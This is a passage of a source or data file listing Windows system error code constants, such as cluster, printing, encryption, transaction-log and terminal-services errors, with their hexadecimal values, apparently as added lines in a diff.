ERROR_TRANSFORM_NOT_SUPPORTED = 0x07D4 + ERROR_CLIPPING_NOT_SUPPORTED = 0x07D5 + ERROR_INVALID_CMM = 0x07DA + ERROR_INVALID_PROFILE = 0x07DB + ERROR_TAG_NOT_FOUND = 0x07DC + ERROR_TAG_NOT_PRESENT = 0x07DD + ERROR_DUPLICATE_TAG = 0x07DE + ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF + ERROR_PROFILE_NOT_FOUND = 0x07E0 + ERROR_INVALID_COLORSPACE = 0x07E1 + ERROR_ICM_NOT_ENABLED = 0x07E2 + ERROR_DELETING_ICM_XFORM = 0x07E3 + ERROR_INVALID_TRANSFORM = 0x07E4 + ERROR_COLORSPACE_MISMATCH = 0x07E5 + ERROR_INVALID_COLORINDEX = 0x07E6 + ERROR_PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 + ERROR_CONNECTED_OTHER_PASSWORD = 0x083C + ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D + ERROR_BAD_USERNAME = 0x089A + ERROR_NOT_CONNECTED = 0x08CA + ERROR_OPEN_FILES = 0x0961 + ERROR_ACTIVE_CONNECTIONS = 0x0962 + ERROR_DEVICE_IN_USE = 0x0964 + ERROR_UNKNOWN_PRINT_MONITOR = 0x0BB8 + ERROR_PRINTER_DRIVER_IN_USE = 0x0BB9 + ERROR_SPOOL_FILE_NOT_FOUND = 0x0BBA + ERROR_SPL_NO_STARTDOC = 0x0BBB + ERROR_SPL_NO_ADDJOB = 0x0BBC + ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD + ERROR_PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE + ERROR_INVALID_PRINT_MONITOR = 0x0BBF + ERROR_PRINT_MONITOR_IN_USE = 0x0BC0 + ERROR_PRINTER_HAS_JOBS_QUEUED = 0x0BC1 + ERROR_SUCCESS_REBOOT_REQUIRED = 0x0BC2 + ERROR_SUCCESS_RESTART_REQUIRED = 0x0BC3 + ERROR_PRINTER_NOT_FOUND = 0x0BC4 + ERROR_PRINTER_DRIVER_WARNED = 0x0BC5 + ERROR_PRINTER_DRIVER_BLOCKED = 0x0BC6 + ERROR_PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 + ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 + ERROR_FAIL_REBOOT_REQUIRED = 0x0BC9 + ERROR_FAIL_REBOOT_INITIATED = 0x0BCA + ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB + ERROR_PRINT_JOB_RESTART_REQUIRED = 0x0BCC + ERROR_IO_REISSUE_AS_CACHED = 0x0F6E + ERROR_WINS_INTERNAL = 0x0FA0 + ERROR_CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 + ERROR_STATIC_INIT = 0x0FA2 + ERROR_INC_BACKUP = 0x0FA3 + ERROR_FULL_BACKUP = 0x0FA4 + ERROR_REC_NON_EXISTENT = 0x0FA5 + ERROR_RPL_NOT_ALLOWED = 0x0FA6 + PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 + PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO = 0x0FD3 + PEERDIST_ERROR_MISSING_DATA = 0x0FD4 + PEERDIST_ERROR_NO_MORE = 0x0FD5 + PEERDIST_ERROR_NOT_INITIALIZED = 0x0FD6 + PEERDIST_ERROR_ALREADY_INITIALIZED = 0x0FD7 + PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS = 0x0FD8 + PEERDIST_ERROR_INVALIDATED = 0x0FD9 + PEERDIST_ERROR_ALREADY_EXISTS = 0x0FDA + PEERDIST_ERROR_OPERATION_NOTFOUND = 0x0FDB + PEERDIST_ERROR_ALREADY_COMPLETED = 0x0FDC + PEERDIST_ERROR_OUT_OF_BOUNDS = 0x0FDD + PEERDIST_ERROR_VERSION_UNSUPPORTED = 0x0FDE + PEERDIST_ERROR_INVALID_CONFIGURATION = 0x0FDF + PEERDIST_ERROR_NOT_LICENSED = 0x0FE0 + PEERDIST_ERROR_SERVICE_UNAVAILABLE = 0x0FE1 + ERROR_DHCP_ADDRESS_CONFLICT = 0x1004 + ERROR_WMI_GUID_NOT_FOUND = 0x1068 + ERROR_WMI_INSTANCE_NOT_FOUND = 0x1069 + ERROR_WMI_ITEMID_NOT_FOUND = 0x106A + ERROR_WMI_TRY_AGAIN = 0x106B + ERROR_WMI_DP_NOT_FOUND = 0x106C + ERROR_WMI_UNRESOLVED_INSTANCE_REF = 0x106D + ERROR_WMI_ALREADY_ENABLED = 0x106E + ERROR_WMI_GUID_DISCONNECTED = 0x106F + ERROR_WMI_SERVER_UNAVAILABLE = 0x1070 + ERROR_WMI_DP_FAILED = 0x1071 + ERROR_WMI_INVALID_MOF = 0x1072 + ERROR_WMI_INVALID_REGINFO = 0x1073 + ERROR_WMI_ALREADY_DISABLED = 0x1074 + ERROR_WMI_READ_ONLY = 0x1075 + ERROR_WMI_SET_FAILURE = 0x1076 + ERROR_INVALID_MEDIA = 0x10CC + ERROR_INVALID_LIBRARY = 0x10CD + ERROR_INVALID_MEDIA_POOL = 0x10CE + ERROR_DRIVE_MEDIA_MISMATCH = 0x10CF + ERROR_MEDIA_OFFLINE = 0x10D0 + ERROR_LIBRARY_OFFLINE = 0x10D1 + ERROR_EMPTY = 0x10D2 + ERROR_NOT_EMPTY = 0x10D3 + ERROR_MEDIA_UNAVAILABLE = 0x10D4 + ERROR_RESOURCE_DISABLED = 0x10D5 + ERROR_INVALID_CLEANER = 0x10D6 + ERROR_UNABLE_TO_CLEAN = 0x10D7 + ERROR_OBJECT_NOT_FOUND = 0x10D8 + ERROR_DATABASE_FAILURE = 0x10D9 + ERROR_DATABASE_FULL = 0x10DA + ERROR_MEDIA_INCOMPATIBLE = 0x10DB + ERROR_RESOURCE_NOT_PRESENT = 0x10DC + ERROR_INVALID_OPERATION = 0x10DD + ERROR_MEDIA_NOT_AVAILABLE = 0x10DE + ERROR_DEVICE_NOT_AVAILABLE = 0x10DF + ERROR_REQUEST_REFUSED = 0x10E0 + ERROR_INVALID_DRIVE_OBJECT = 0x10E1 + ERROR_LIBRARY_FULL = 0x10E2 + ERROR_MEDIUM_NOT_ACCESSIBLE = 0x10E3 + ERROR_UNABLE_TO_LOAD_MEDIUM = 0x10E4 + ERROR_UNABLE_TO_INVENTORY_DRIVE = 0x10E5 + ERROR_UNABLE_TO_INVENTORY_SLOT = 0x10E6 + ERROR_UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 + ERROR_TRANSPORT_FULL = 0x10E8 + ERROR_CONTROLLING_IEPORT = 0x10E9 + ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA + ERROR_CLEANER_SLOT_SET = 0x10EB + ERROR_CLEANER_SLOT_NOT_SET = 0x10EC + ERROR_CLEANER_CARTRIDGE_SPENT = 0x10ED + ERROR_UNEXPECTED_OMID = 0x10EE + ERROR_CANT_DELETE_LAST_ITEM = 0x10EF + ERROR_MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 + ERROR_VOLUME_CONTAINS_SYS_FILES = 0x10F1 + ERROR_INDIGENOUS_TYPE = 0x10F2 + ERROR_NO_SUPPORTING_DRIVES = 0x10F3 + ERROR_CLEANER_CARTRIDGE_INSTALLED = 0x10F4 + ERROR_IEPORT_FULL = 0x10F5 + ERROR_FILE_OFFLINE = 0x10FE + ERROR_REMOTE_STORAGE_NOT_ACTIVE = 0x10FF + ERROR_REMOTE_STORAGE_MEDIA_ERROR = 0x1100 + ERROR_NOT_A_REPARSE_POINT = 0x1126 + ERROR_REPARSE_ATTRIBUTE_CONFLICT = 0x1127 + ERROR_INVALID_REPARSE_DATA = 0x1128 + ERROR_REPARSE_TAG_INVALID = 0x1129 + ERROR_REPARSE_TAG_MISMATCH = 0x112A + ERROR_VOLUME_NOT_SIS_ENABLED = 0x1194 + ERROR_DEPENDENT_RESOURCE_EXISTS = 0x1389 + ERROR_DEPENDENCY_NOT_FOUND = 0x138A + ERROR_DEPENDENCY_ALREADY_EXISTS = 0x138B + ERROR_RESOURCE_NOT_ONLINE = 0x138C + ERROR_HOST_NODE_NOT_AVAILABLE = 0x138D + ERROR_RESOURCE_NOT_AVAILABLE = 0x138E + ERROR_RESOURCE_NOT_FOUND = 0x138F + ERROR_SHUTDOWN_CLUSTER = 0x1390 + ERROR_CANT_EVICT_ACTIVE_NODE = 0x1391 + ERROR_OBJECT_ALREADY_EXISTS = 0x1392 + ERROR_OBJECT_IN_LIST = 0x1393 + ERROR_GROUP_NOT_AVAILABLE = 0x1394 + ERROR_GROUP_NOT_FOUND = 0x1395 + ERROR_GROUP_NOT_ONLINE = 0x1396 + ERROR_HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 + ERROR_HOST_NODE_NOT_GROUP_OWNER = 0x1398 + ERROR_RESMON_CREATE_FAILED = 0x1399 + ERROR_RESMON_ONLINE_FAILED = 0x139A + ERROR_RESOURCE_ONLINE = 0x139B + ERROR_QUORUM_RESOURCE = 0x139C + ERROR_NOT_QUORUM_CAPABLE = 0x139D + ERROR_CLUSTER_SHUTTING_DOWN = 0x139E + ERROR_INVALID_STATE = 0x139F + ERROR_RESOURCE_PROPERTIES_STORED = 0x13A0 + ERROR_NOT_QUORUM_CLASS = 0x13A1 + ERROR_CORE_RESOURCE = 0x13A2 + ERROR_QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 + ERROR_QUORUMLOG_OPEN_FAILED = 0x13A4 + ERROR_CLUSTERLOG_CORRUPT = 0x13A5 + ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 + ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 + ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 + ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 + ERROR_QUORUM_OWNER_ALIVE = 0x13AA + ERROR_NETWORK_NOT_AVAILABLE = 0x13AB + ERROR_NODE_NOT_AVAILABLE = 0x13AC + ERROR_ALL_NODES_NOT_AVAILABLE = 0x13AD + ERROR_RESOURCE_FAILED = 0x13AE + ERROR_CLUSTER_INVALID_NODE = 0x13AF + ERROR_CLUSTER_NODE_EXISTS = 0x13B0 + ERROR_CLUSTER_JOIN_IN_PROGRESS = 0x13B1 + ERROR_CLUSTER_NODE_NOT_FOUND = 0x13B2 + ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 + ERROR_CLUSTER_NETWORK_EXISTS = 0x13B4 + ERROR_CLUSTER_NETWORK_NOT_FOUND = 0x13B5 + ERROR_CLUSTER_NETINTERFACE_EXISTS = 0x13B6 + ERROR_CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 + ERROR_CLUSTER_INVALID_REQUEST = 0x13B8 + ERROR_CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 + ERROR_CLUSTER_NODE_DOWN = 0x13BA + ERROR_CLUSTER_NODE_UNREACHABLE = 0x13BB + ERROR_CLUSTER_NODE_NOT_MEMBER = 0x13BC + ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD + ERROR_CLUSTER_INVALID_NETWORK = 0x13BE + ERROR_CLUSTER_NODE_UP = 0x13C0 + ERROR_CLUSTER_IPADDR_IN_USE = 0x13C1 + ERROR_CLUSTER_NODE_NOT_PAUSED = 0x13C2 + ERROR_CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 + ERROR_CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 + ERROR_CLUSTER_NODE_ALREADY_UP = 0x13C5 + ERROR_CLUSTER_NODE_ALREADY_DOWN = 0x13C6 + ERROR_CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 + ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 + ERROR_CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 + ERROR_CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA + ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB + ERROR_INVALID_OPERATION_ON_QUORUM = 0x13CC + ERROR_DEPENDENCY_NOT_ALLOWED = 0x13CD + ERROR_CLUSTER_NODE_PAUSED = 0x13CE + ERROR_NODE_CANT_HOST_RESOURCE = 0x13CF + ERROR_CLUSTER_NODE_NOT_READY = 0x13D0 + ERROR_CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 + ERROR_CLUSTER_JOIN_ABORTED = 0x13D2 + ERROR_CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 + ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 + ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 + ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 + ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 + ERROR_CLUSTER_RESNAME_NOT_FOUND = 0x13D8 + ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 + ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA + ERROR_CLUSTER_DATABASE_SEQMISMATCH = 0x13DB + ERROR_RESMON_INVALID_STATE = 0x13DC + ERROR_CLUSTER_GUM_NOT_LOCKER = 0x13DD + ERROR_QUORUM_DISK_NOT_FOUND = 0x13DE + ERROR_DATABASE_BACKUP_CORRUPT = 0x13DF + ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 + ERROR_RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 + ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 + ERROR_CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 + ERROR_CLUSTER_MEMBERSHIP_HALT = 0x1704 + ERROR_CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 + ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 + ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 + ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 + ERROR_CLUSTER_PARAMETER_MISMATCH = 0x1709 + ERROR_NODE_CANNOT_BE_CLUSTERED = 0x170A + ERROR_CLUSTER_WRONG_OS_VERSION = 0x170B + ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C + ERROR_CLUSCFG_ALREADY_COMMITTED = 0x170D + ERROR_CLUSCFG_ROLLBACK_FAILED = 0x170E + ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F + ERROR_CLUSTER_OLD_VERSION = 0x1710 + ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 + ERROR_CLUSTER_NO_NET_ADAPTERS = 0x1712 + ERROR_CLUSTER_POISONED = 0x1713 + ERROR_CLUSTER_GROUP_MOVING = 0x1714 + ERROR_CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 + ERROR_RESOURCE_CALL_TIMED_OUT = 0x1716 + ERROR_INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 + ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 + ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 + ERROR_CLUSTER_PARTIAL_SEND = 0x171A + ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B + ERROR_CLUSTER_INVALID_STRING_TERMINATION = 0x171C + ERROR_CLUSTER_INVALID_STRING_FORMAT = 0x171D + ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E + ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F + ERROR_CLUSTER_NULL_DATA = 0x1720 + ERROR_CLUSTER_PARTIAL_READ = 0x1721 + ERROR_CLUSTER_PARTIAL_WRITE = 0x1722 + ERROR_CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 + ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 + ERROR_CLUSTER_NO_QUORUM = 0x1725 + ERROR_CLUSTER_INVALID_IPV6_NETWORK = 0x1726 + ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 + ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 + ERROR_DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 + ERROR_EXCEPTION_IN_RESOURCE_CALL = 0x172A + ERROR_CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B + ERROR_CLUSTER_NOT_INSTALLED = 0x172C + ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D + ERROR_CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E + ERROR_CLUSTER_TOO_MANY_NODES = 0x172F + ERROR_CLUSTER_OBJECT_ALREADY_USED = 0x1730 + ERROR_NONCORE_GROUPS_FOUND = 0x1731 + ERROR_FILE_SHARE_RESOURCE_CONFLICT = 0x1732 + ERROR_CLUSTER_EVICT_INVALID_REQUEST = 0x1733 + ERROR_CLUSTER_SINGLETON_RESOURCE = 0x1734 + ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 + ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 + ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 + ERROR_CLUSTER_GROUP_BUSY = 0x1738 + ERROR_CLUSTER_NOT_SHARED_VOLUME = 0x1739 + ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A + ERROR_CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B + ERROR_CLUSTER_USE_SHARED_VOLUMES_API = 0x173C + ERROR_CLUSTER_BACKUP_IN_PROGRESS = 0x173D + ERROR_NON_CSV_PATH = 0x173E + ERROR_CSV_VOLUME_NOT_LOCAL = 0x173F + ERROR_CLUSTER_WATCHDOG_TERMINATING = 0x1740 + ERROR_ENCRYPTION_FAILED = 0x1770 + ERROR_DECRYPTION_FAILED = 0x1771 + ERROR_FILE_ENCRYPTED = 0x1772 + ERROR_NO_RECOVERY_POLICY = 0x1773 + ERROR_NO_EFS = 0x1774 + ERROR_WRONG_EFS = 0x1775 + ERROR_NO_USER_KEYS = 0x1776 + ERROR_FILE_NOT_ENCRYPTED = 0x1777 + ERROR_NOT_EXPORT_FORMAT = 0x1778 + ERROR_FILE_READ_ONLY = 0x1779 + ERROR_DIR_EFS_DISALLOWED = 0x177A + ERROR_EFS_SERVER_NOT_TRUSTED = 0x177B + ERROR_BAD_RECOVERY_POLICY = 0x177C + ERROR_EFS_ALG_BLOB_TOO_BIG = 0x177D + ERROR_VOLUME_NOT_SUPPORT_EFS = 0x177E + ERROR_EFS_DISABLED = 0x177F + ERROR_EFS_VERSION_NOT_SUPPORT = 0x1780 + ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 + ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 + ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 + ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 + ERROR_CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 + ERROR_NO_BROWSER_SERVERS_FOUND = 0x17E6 + SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 + ERROR_LOG_SECTOR_INVALID = 0x19C8 + ERROR_LOG_SECTOR_PARITY_INVALID = 0x19C9 + ERROR_LOG_SECTOR_REMAPPED = 0x19CA + ERROR_LOG_BLOCK_INCOMPLETE = 0x19CB + ERROR_LOG_INVALID_RANGE = 0x19CC + ERROR_LOG_BLOCKS_EXHAUSTED = 0x19CD + ERROR_LOG_READ_CONTEXT_INVALID = 0x19CE + ERROR_LOG_RESTART_INVALID = 0x19CF + ERROR_LOG_BLOCK_VERSION = 0x19D0 + ERROR_LOG_BLOCK_INVALID = 0x19D1 + ERROR_LOG_READ_MODE_INVALID = 0x19D2 + ERROR_LOG_NO_RESTART = 0x19D3 + ERROR_LOG_METADATA_CORRUPT = 0x19D4 + ERROR_LOG_METADATA_INVALID = 0x19D5 + ERROR_LOG_METADATA_INCONSISTENT = 0x19D6 + ERROR_LOG_RESERVATION_INVALID = 0x19D7 + ERROR_LOG_CANT_DELETE = 0x19D8 + ERROR_LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 + ERROR_LOG_START_OF_LOG = 0x19DA + ERROR_LOG_POLICY_ALREADY_INSTALLED = 0x19DB + ERROR_LOG_POLICY_NOT_INSTALLED = 0x19DC + ERROR_LOG_POLICY_INVALID = 0x19DD + ERROR_LOG_POLICY_CONFLICT = 0x19DE + ERROR_LOG_PINNED_ARCHIVE_TAIL = 0x19DF + ERROR_LOG_RECORD_NONEXISTENT = 0x19E0 + ERROR_LOG_RECORDS_RESERVED_INVALID = 0x19E1 + ERROR_LOG_SPACE_RESERVED_INVALID = 0x19E2 + ERROR_LOG_TAIL_INVALID = 0x19E3 + ERROR_LOG_FULL = 0x19E4 + ERROR_COULD_NOT_RESIZE_LOG = 0x19E5 + ERROR_LOG_MULTIPLEXED = 0x19E6 + ERROR_LOG_DEDICATED = 0x19E7 + ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 + ERROR_LOG_ARCHIVE_IN_PROGRESS = 0x19E9 + ERROR_LOG_EPHEMERAL = 0x19EA + ERROR_LOG_NOT_ENOUGH_CONTAINERS = 0x19EB + ERROR_LOG_CLIENT_ALREADY_REGISTERED = 0x19EC + ERROR_LOG_CLIENT_NOT_REGISTERED = 0x19ED + ERROR_LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE + ERROR_LOG_CONTAINER_READ_FAILED = 0x19EF + ERROR_LOG_CONTAINER_WRITE_FAILED = 0x19F0 + ERROR_LOG_CONTAINER_OPEN_FAILED = 0x19F1 + ERROR_LOG_CONTAINER_STATE_INVALID = 0x19F2 + ERROR_LOG_STATE_INVALID = 0x19F3 + ERROR_LOG_PINNED = 0x19F4 + ERROR_LOG_METADATA_FLUSH_FAILED = 0x19F5 + ERROR_LOG_INCONSISTENT_SECURITY = 0x19F6 + ERROR_LOG_APPENDED_FLUSH_FAILED = 0x19F7 + ERROR_LOG_PINNED_RESERVATION = 0x19F8 + ERROR_INVALID_TRANSACTION = 0x1A2C + ERROR_TRANSACTION_NOT_ACTIVE = 0x1A2D + ERROR_TRANSACTION_REQUEST_NOT_VALID = 0x1A2E + ERROR_TRANSACTION_NOT_REQUESTED = 0x1A2F + ERROR_TRANSACTION_ALREADY_ABORTED = 0x1A30 + ERROR_TRANSACTION_ALREADY_COMMITTED = 0x1A31 + ERROR_TM_INITIALIZATION_FAILED = 0x1A32 + ERROR_RESOURCEMANAGER_READ_ONLY = 0x1A33 + ERROR_TRANSACTION_NOT_JOINED = 0x1A34 + ERROR_TRANSACTION_SUPERIOR_EXISTS = 0x1A35 + ERROR_CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 + ERROR_TRANSACTION_PROPAGATION_FAILED = 0x1A37 + ERROR_CRM_PROTOCOL_NOT_FOUND = 0x1A38 + ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 + ERROR_CURRENT_TRANSACTION_NOT_VALID = 0x1A3A + ERROR_TRANSACTION_NOT_FOUND = 0x1A3B + ERROR_RESOURCEMANAGER_NOT_FOUND = 0x1A3C + ERROR_ENLISTMENT_NOT_FOUND = 0x1A3D + ERROR_TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E + ERROR_TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F + ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 + ERROR_TRANSACTION_NOT_ROOT = 0x1A41 + ERROR_TRANSACTION_OBJECT_EXPIRED = 0x1A42 + ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 + ERROR_TRANSACTION_RECORD_TOO_LONG = 0x1A44 + ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 + ERROR_TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 + ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 + ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 + ERROR_TRANSACTION_MUST_WRITETHROUGH = 0x1A49 + ERROR_TRANSACTION_NO_SUPERIOR = 0x1A4A + ERROR_HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B + ERROR_TRANSACTIONAL_CONFLICT = 0x1A90 + ERROR_RM_NOT_ACTIVE = 0x1A91 + ERROR_RM_METADATA_CORRUPT = 0x1A92 + ERROR_DIRECTORY_NOT_RM = 0x1A93 + ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 + ERROR_LOG_RESIZE_INVALID_SIZE = 0x1A96 + ERROR_OBJECT_NO_LONGER_EXISTS = 0x1A97 + ERROR_STREAM_MINIVERSION_NOT_FOUND = 0x1A98 + ERROR_STREAM_MINIVERSION_NOT_VALID = 0x1A99 + ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A + ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B + ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C + ERROR_REMOTE_FILE_VERSION_MISMATCH = 0x1A9E + ERROR_HANDLE_NO_LONGER_VALID = 0x1A9F + ERROR_NO_TXF_METADATA = 0x1AA0 + ERROR_LOG_CORRUPTION_DETECTED = 0x1AA1 + ERROR_CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 + ERROR_RM_DISCONNECTED = 0x1AA3 + ERROR_ENLISTMENT_NOT_SUPERIOR = 0x1AA4 + ERROR_RECOVERY_NOT_NEEDED = 0x1AA5 + ERROR_RM_ALREADY_STARTED = 0x1AA6 + ERROR_FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 + ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 + ERROR_CANT_CROSS_RM_BOUNDARY = 0x1AA9 + ERROR_TXF_DIR_NOT_EMPTY = 0x1AAA + ERROR_INDOUBT_TRANSACTIONS_EXIST = 0x1AAB + ERROR_TM_VOLATILE = 0x1AAC + ERROR_ROLLBACK_TIMER_EXPIRED = 0x1AAD + ERROR_TXF_ATTRIBUTE_CORRUPT = 0x1AAE + ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF + ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 + ERROR_LOG_GROWTH_FAILED = 0x1AB1 + ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 + ERROR_TXF_METADATA_ALREADY_PRESENT = 0x1AB3 + ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 + ERROR_TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 + ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 + ERROR_TRANSACTIONS_NOT_FROZEN = 0x1AB7 + ERROR_TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 + ERROR_NOT_SNAPSHOT_VOLUME = 0x1AB9 + ERROR_NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA + ERROR_DATA_LOST_REPAIR = 0x1ABB + ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC + ERROR_TM_IDENTITY_MISMATCH = 0x1ABD + ERROR_FLOATED_SECTION = 0x1ABE + ERROR_CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF + ERROR_CANNOT_ABORT_TRANSACTIONS = 0x1AC0 + ERROR_BAD_CLUSTERS = 0x1AC1 + ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 + ERROR_VOLUME_DIRTY = 0x1AC3 + ERROR_NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 + ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 + ERROR_EXPIRED_HANDLE = 0x1AC6 + ERROR_TRANSACTION_NOT_ENLISTED = 0x1AC7 + ERROR_CTX_WINSTATION_NAME_INVALID = 0x1B59 + ERROR_CTX_INVALID_PD = 0x1B5A + ERROR_CTX_PD_NOT_FOUND = 0x1B5B + ERROR_CTX_WD_NOT_FOUND = 0x1B5C + ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D + ERROR_CTX_SERVICE_NAME_COLLISION = 0x1B5E + ERROR_CTX_CLOSE_PENDING = 0x1B5F + ERROR_CTX_NO_OUTBUF = 0x1B60 + ERROR_CTX_MODEM_INF_NOT_FOUND = 0x1B61 + ERROR_CTX_INVALID_MODEMNAME = 0x1B62 + ERROR_CTX_MODEM_RESPONSE_ERROR = 0x1B63 + ERROR_CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 + ERROR_CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 + ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 + ERROR_CTX_MODEM_RESPONSE_BUSY = 0x1B67 + ERROR_CTX_MODEM_RESPONSE_VOICE = 0x1B68 + ERROR_CTX_TD_ERROR = 0x1B69 + ERROR_CTX_WINSTATION_NOT_FOUND = 0x1B6E + ERROR_CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F + ERROR_CTX_WINSTATION_BUSY = 0x1B70 + ERROR_CTX_BAD_VIDEO_MODE = 0x1B71 + ERROR_CTX_GRAPHICS_INVALID = 0x1B7B + 